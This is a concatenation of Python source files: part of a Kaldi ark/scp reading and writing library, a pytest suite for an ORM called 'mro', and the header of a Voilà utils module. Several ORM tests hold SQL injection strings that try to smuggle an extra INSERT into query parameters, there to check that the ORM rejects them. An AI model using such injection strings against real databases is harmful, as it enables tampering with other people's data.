if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None: fd.seek(int(offset))
return fd
# based on '/usr/local/lib/python3.6/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stderr=sys.stderr)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
assert(re.match('^\S+$',key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='int32')
# Elements from int32 vector are sored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
ans = _read_vec_flt_binary(fd)
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_vec_flt_binary(fd):
header = fd.read(3).decode()
if header == 'FV ' : sample_size = 4 # floats
elif header == 'DV ' : sample_size = 8 # doubles
else : raise UnknownVectorHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimension,
assert (fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='float32')
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
col_headers = np.array([np.array([x for x in y]) * globrange * 1.52590218966964e-05 + globmin for y in col_headers], dtype=np.float32)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.zeros((cols,rows), dtype='float32')
p0 = col_headers[:, 0].reshape(-1, 1)
p25 = col_headers[:, 1].reshape(-1, 1)
p75 = col_headers[:, 2].reshape(-1, 1)
p100 = col_headers[:, 3].reshape(-1, 1)
mask_0_64 = (data <= 64)
mask_193_255 = (data > 192)
mask_65_192 = (~(mask_0_64 | mask_193_255))
mat += (p0 + (p25 - p0) / 64. * data) * mask_0_64.astype(np.float32)
mat += (p25 + (p75 - p25) / 128. * (data - 64)) * mask_65_192.astype(np.float32)
mat += (p75 + (p100 - p75) / 63. * (data - 192)) * mask_193_255.astype(np.float32)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_rxspec(file_):
""" adaptor to read both 'ark:...' and 'scp:...' inputs of posteriors,
"""
if file_.startswith("ark:"):
return read_post_ark(file_)
elif file_.startswith("scp:"):
return read_post_scp(file_)
else:
print("unsupported intput type: %s" % file_)
print("it should begint with 'ark:' or 'scp:'")
sys.exit(1)
def read_post_scp(file_or_fd):
""" generator(key,post) = read_post_scp(file_or_fd)
Returns generator of (key,post) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,post in kaldi_io.read_post_scp(file):
...
Read scp to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
post = read_post(rxfile)
yield key, post
finally:
if fd is not file_or_fd : fd.close()
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
|
table_test.py
|
import pytest
import mro
import connection as con
from datetime import datetime, date
from threading import Thread, Event
class table1(mro.table.table):
column1 = mro.data_types.integer('column1', 0, not_null=False, is_updateable=True, get_value_on_insert = False, is_primary_key = False)
column2 = mro.data_types.varchar('column2', 1, 20, not_null=False, is_updateable=True, get_value_on_insert = False, is_primary_key = False)
column3 = mro.data_types.integer('column3', 1, not_null=False, is_updateable=True, get_value_on_insert = False, is_primary_key = False)
def __init__(self, **kwargs):
self.__dict__['column1'] = 1
self.__dict__['column2'] = None
self.__dict__['column3'] = None
for k, v in kwargs.items():
if not hasattr(self, k):
raise ValueError("{} does not have an attribute {}".format(self.__class__.__name__, k))
self.__dict__[k] = v
if not mro.table.disable_insert():
obj = super().insert(**kwargs)
for c in table1._get_value_on_insert_columns:
self.__dict__[c] = obj.__dict__[c]
def update(self, **kwargs):
primary_key_columns = table1._primary_key_columns
primary_key_column_values = [self.__dict__[c] for c in primary_key_columns]
super().update(primary_key_columns, primary_key_column_values, **kwargs)
table1._register()
@pytest.fixture
def connection_function(request):
connection = con.connect()
request.addfinalizer(mro.disconnect)
cursor = connection.cursor()
con.drop_tables()
cursor.execute("create table table1 (id serial primary key, created_date date not null default current_date, column1 integer default 1, column2 varchar(20), column3 integer, column4 float default 1.2, column5 bool default False, column6 oid default 999)")
cursor.execute("create table table2 (column1 varchar(20), column2 integer, column3 varchar(20))")
cursor.execute("create table table3 (created_datetime timestamp not null default current_timestamp, created_time time not null default current_time, column1 varchar(20) default 'ABC DEF', column2 integer, column3 varchar(20), column4 jsonb, column5 bool, column6 oid)")
cursor.execute("insert into table1 (column1, column2, column3, column6) values (%s,%s,%s,%s)", (1,'Hello World!', 2, 777))
cursor.execute("insert into table1 (column1, column2, column3) values (%s,%s,%s)", (2,'Hello World2!', 3))
cursor.execute("insert into table2 values (%s,%s,%s)", ('Hello World3!', 4, 'Hello World4!'))
connection.commit()
connection.close()
return lambda: con.connect()
@pytest.fixture
def connection_function_for_threadsafe_test(request):
connection = con.connect()
request.addfinalizer(mro.disconnect)
cursor = connection.cursor()
con.drop_tables()
cursor.execute("create table table1 (id serial primary key, created_date date not null default current_date, column1 integer default 1, column2 varchar(20), column3 integer, column4 float default 1.2, column5 bool default False, column6 oid default 999)")
cursor.execute("create table table2 (id serial primary key, created_date date not null default current_date, column1 integer default 1, column2 varchar(20), column3 integer, column4 float default 1.2, column5 bool default False, column6 oid default 999)")
for i in range(3000):
cursor.execute("insert into table1 (column1, column2, column3, column6) values (%s,%s,%s,%s)", (i,'Hello World!', 2, 777))
cursor.execute("insert into table2 (column1, column2, column3, column6) values (%s,%s,%s,%s)", (i, 'Hello World!', 2, 777))
connection.commit()
connection.close()
return lambda: con.connect()
class TestTable(object):
def test_table_reflection(self, connection_function):
mro.load_database(connection_function)
tables = mro.table1.select()
assert len(tables) == 2
assert isinstance(tables[0].created_date, date)
assert tables[0].column1 == 1
assert tables[0].column2 == 'Hello World!'
assert tables[0].column3 == 2
assert tables[0].column6 == 777
assert tables[1].column1 == 2
assert tables[1].column2 == 'Hello World2!'
assert tables[1].column3 == 3
tables = mro.table2.select()
assert len(tables) == 1
assert tables[0].column1 == 'Hello World3!'
assert tables[0].column2 == 4
assert tables[0].column3 == 'Hello World4!'
def test_table_select_filter(self, connection_function):
mro.load_database(connection_function)
tables = mro.table1.select('column1 = %d' % 2)
assert len(tables) == 1
assert tables[0].column1 == 2
assert tables[0].column2 == 'Hello World2!'
assert tables[0].column3 == 3
tables = mro.table2.select("column1 = '%d'" % 1)
assert len(tables) == 0
def test_table_select(self, connection_function):
mro.load_database(connection_function)
assert len(mro.table1.select()) is 2
assert len(mro.table1.select("column1=1")) is 1
def test_table_select_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
initial_tables = mro.table1.select()
injection_string = "1; insert into table1(column1, column2, column3) values(3,'Hello World3!',4); select * from table1"
# Check we throw an exception if the input variable contains an injection string
with pytest.raises(Exception):
mro.table1.select("column1 = %s;", injection_string)
# Check that since the attempted injection we haven't been able to insert another row using the select with user input
current_tables = mro.table1.select()
assert len(current_tables) == len(initial_tables)
# Check the positive case, that we can select using pyformat syntax
assert len(mro.table1.select("column1 = %s", 1)) is 1
def test_table_select_count(self, connection_function):
mro.load_database(connection_function)
assert mro.table1.select_count() is 2
assert mro.table1.select_count("column1=1") is 1
def test_table_select_count_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
injection_string = "1; insert into table1(column1, column2, column3) values(3,'Hello World3!',4); select count(*) from table1"
initial_table_count = mro.table1.select_count()
with pytest.raises(Exception):
mro.table1.select_count("column1 = %s;", injection_string)
# Check that since the attempted injection we haven't been able to insert another row using the select count with user input
current_table_count = mro.table1.select_count()
assert current_table_count == initial_table_count
# Check the positive case, that we can select count with pyformat syntax
assert mro.table1.select_count("column1 = %s", 1) is 1
def test_table_select_one(self, connection_function):
mro.load_database(connection_function)
assert mro.table1.select_one("column1 = 1").column1 is 1
assert mro.table2.select_one().column2 is 4
def test_table_select_one_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
injection_string = "1; insert into table1(column1, column2, column3) values(3,'Hello World3!',4); select * from table1"
initial_table_count = mro.table1.select_count()
with pytest.raises(Exception):
mro.table1.select_one("column1 = %s;", injection_string)
# Check that since the attempted injection we haven't been able to insert another row using the select count with user input
current_table_count = mro.table1.select_count()
assert current_table_count == initial_table_count
# Check the positive case we can select one using this pyformat syntax
assert mro.table1.select_one("column1 = %s", 1).column1 is 1
def test_table_delete_filter(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1.select_count()
tables = mro.table1.select('column1 = %d' % 2)
assert len(tables) == 1
assert tables[0].column1 == 2
assert tables[0].column2 == 'Hello World2!'
assert tables[0].column3 == 3
mro.table1.delete('column1 = %d' % 2)
assert table_count - 1 == mro.table1.select_count()
def test_table_delete(self, connection_function):
mro.load_database(connection_function)
mro.table1.delete('column1 = 1')
assert mro.table1.select_count('column1 = 1') is 0
assert mro.table1.select_count() is not 0
mro.table1.delete()
assert mro.table1.select_count() is 0
def test_table_delete_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
assert mro.table1.select_count("column1=1") is not 0
mro.table1.delete('column2 = %s',
"1; insert into table1(column1,column2,column3) values(4, 'row in on delete', 6);")
# Check we didn't delete as the column didn't match the whole string, also check we didn't insert a new row into the table
assert mro.table1.select_count("column1 = 1") is not 0
assert mro.table1.select_count("column2 = 'row in on delete'") is 0
# Check the positive case, we can delete using the pyformat syntax
mro.table1.delete("column1=%s",1)
assert mro.table1.select_count("column1=1") is 0
def test_create_object(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1.select_count()
table = mro.table1(column1=3, column2='Hi!', column3=11, column6=10)
assert table.column1 == 3
assert table.column2 == 'Hi!'
assert table.column3 == 11
assert table.column6 == 10
table = mro.table1(column2 = 'Hi2!')
assert table.column1 == 1
assert table.column2 == 'Hi2!'
assert table.column3 is None
kwargs = {'column1': 5, 'column2': 'Hi3!', 'column3': 78, 'column6': 22}
table = mro.table1(**kwargs)
assert table.column1 == 5
assert table.column2 == 'Hi3!'
assert table.column3 == 78
assert table.column6 == 22
tables = mro.table1.select()
assert table_count + 3 == len(tables)
assert tables[4].column1 == 5
assert tables[4].column2 == 'Hi3!'
assert tables[4].column3 == 78
assert tables[4].column6 == 22
def test_insert_check_default_values(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1.select_count()
table = mro.table1(column1 = 3, column2 = 'Hi!')
assert table.column4 == 1.2
assert table.column5 is False
assert table.column6 == 999
table = mro.table1(column1 = 3, column2 = 'Hi!', column3 = 11, column4=5.7, column5=True, created_date = datetime.now().date(), column6=88)
assert table.column4 == 5.7
assert table.column5 is True
assert table.column6 == 88
tables = mro.table1.select()
for table in tables:
assert isinstance(table.id, int)
assert table.id is not None
assert isinstance(table.created_date, date)
assert table.created_date is not None
assert isinstance(table.column1, int)
assert table.column1 is not None
assert isinstance(table.column2, str)
assert table.column2 is not None
assert table.column3 is None or isinstance(table.column3, int)
assert isinstance(table.column5, bool)
assert isinstance(table.column6, int)
table = mro.table3(column3 = 'Hi56!', column4 = '{"data": 1}')
table = mro.table3.select_one("column3 = 'Hi56!'")
assert isinstance(table.column1, str)
assert table.column1 == 'ABC DEF'
assert isinstance(table.column3, str)
assert table.column3 is not None
assert isinstance(table.column4, str)
assert table.column4 is not None
assert table.column5 is None
assert table.column6 is None
def test_insert_many(self, connection_function):
mro.load_database(connection_function)
mro.table1.delete()
table = mro.table1.insert_many(
['column1', 'column2', 'column3'],
[
[1, 'Hi!', 7],
[2, 'Hi2!', 13],
[3, 'Hi3!', 21]
])
tables = mro.table1.select()
assert 3 == len(tables)
assert tables[0].column1 == 1
assert tables[0].column2 == 'Hi!'
assert tables[0].column3 == 7
assert tables[1].column1 == 2
assert tables[1].column2 == 'Hi2!'
assert tables[1].column3 == 13
assert tables[2].column1 == 3
assert tables[2].column2 == 'Hi3!'
assert tables[2].column3 == 21
def test_insert_with_only_primary_key_no_kwargs(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1()
def test_disable_insert_thread_safe(self, connection_function_for_threadsafe_test):
mro.load_database(connection_function_for_threadsafe_test)
closedown_event = Event()
thread1 = Thread(target=simple_select, args=(mro.table1.select, "thread1", closedown_event))
thread1.start()
thread2 = Thread(target=simple_select, args=(mro.table2.select, "thread2", closedown_event))
thread2.start()
thread3 = Thread(target=simple_select, args=(mro.table1.select, "thread3", closedown_event))
thread3.start()
thread1.join()
thread2.join()
thread3.join()
successful = True
if closedown_event.wait(0):
successful = False
assert successful
def simple_select(select_function, name, closedown_event):
count = 0
iterations = 10
log_every = 3
while count < iterations:
try:
if closedown_event.wait(0):
return
if count % log_every == 0:
print(f"{name} Iterated {count} times")
count = count + 1
tables = select_function()
except Exception as ex:
print(f"Exception in {name}: {str(ex)}")
closedown_event.set()
return
if __name__ == '__main__':
#pytest.main([__file__])
pytest.main([__file__ + '::TestTable::test_insert_with_only_primary_key_no_kwargs'])
|
utils.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import asyncio
from functools import partial
import os
import threading
from enum import Enum
from typing import Awaitable
import websockets
import jinja2
from .static_file_handler import TemplateStaticFileHandler
class ENV_VARIABLE(str, Enum):
VOILA_PREHEAT = 'VOILA_PREHEAT'
VOILA_KERNEL_ID = 'VOILA_KERNEL_ID'
VOILA_BASE_URL = 'VOILA_BASE_URL'
VOILA_APP_IP = 'VOILA_APP_IP'
VOILA_APP_PORT = 'VOILA_APP_PORT'
VOILA_APP_PROTOCOL = 'VOILA_APP_PROTOCOL'
